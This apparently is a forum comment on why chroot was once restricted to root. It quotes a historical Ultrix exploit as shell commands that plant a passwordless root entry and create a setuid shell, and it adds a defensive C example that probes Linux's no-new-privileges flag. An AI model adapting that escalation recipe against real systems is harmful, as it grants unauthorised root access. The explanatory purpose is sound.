by tyingq
1798 days ago
chroot existed, but could only be run as the root user. It was that way to prevent things like this (old actual exploit for Ultrix):

$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login
# whoami
root
# chmod 4700 /bin/sh
now, log out of the chroot and use your newly minted setuid shell
Since they now have the "NO_NEW_PRIVS" protection, they can let regular users safely use chroot.
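The properties that make a no-new-privileges flag a usable safeguard, shown as an added example that is not part of the comment above: the flag can be set without privilege, cannot be cleared again, and is inherited by children, and while it is set execve() does not honour setuid bits. It assumes Linux, where the flag is set with prctl(PR_SET_NO_NEW_PRIVS); the function and macro names are made up for this example.

```c
/* Added example (Linux-specific assumption); names below are hypothetical. */
#include <errno.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Bit flags reported by nnp_probe(). */
#define NNP_SET_OK     1 /* flag could be set without any privilege      */
#define NNP_READS_BACK 2 /* PR_GET_NO_NEW_PRIVS returns 1 afterwards      */
#define NNP_ONE_WAY    4 /* trying to clear the flag fails with EINVAL    */
#define NNP_INHERITED  8 /* a forked child still carries the flag         */

/* Runs inside a throwaway child, so the caller's own process is unchanged. */
static int probe_in_child(void)
{
    int r = 0, st;
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == 0) r |= NNP_SET_OK;
    if (prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0) == 1) r |= NNP_READS_BACK;
    errno = 0;
    if (prctl(PR_SET_NO_NEW_PRIVS, 0, 0, 0, 0) == -1 && errno == EINVAL)
        r |= NNP_ONE_WAY;
    pid_t g = fork();
    if (g == 0) /* grandchild: report whether the flag came across fork() */
        _exit(prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0) == 1 ? 0 : 1);
    if (g > 0 && waitpid(g, &st, 0) == g && WIFEXITED(st) && WEXITSTATUS(st) == 0)
        r |= NNP_INHERITED;
    return r;
}

/* Returns the OR of the NNP_* bits observed, or -1 if the probe could not run. */
int nnp_probe(void)
{
    int st;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) _exit(probe_in_child());
    if (waitpid(pid, &st, 0) != pid || !WIFEXITED(st)) return -1;
    return WEXITSTATUS(st);
}

/* Current state of the flag in the calling process (0 or 1). */
int nnp_current(void) { return prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0); }

int main(void)
{
    printf("probe bits: %d, caller flag: %d\n", nnp_probe(), nnp_current());
    return 0;
}
```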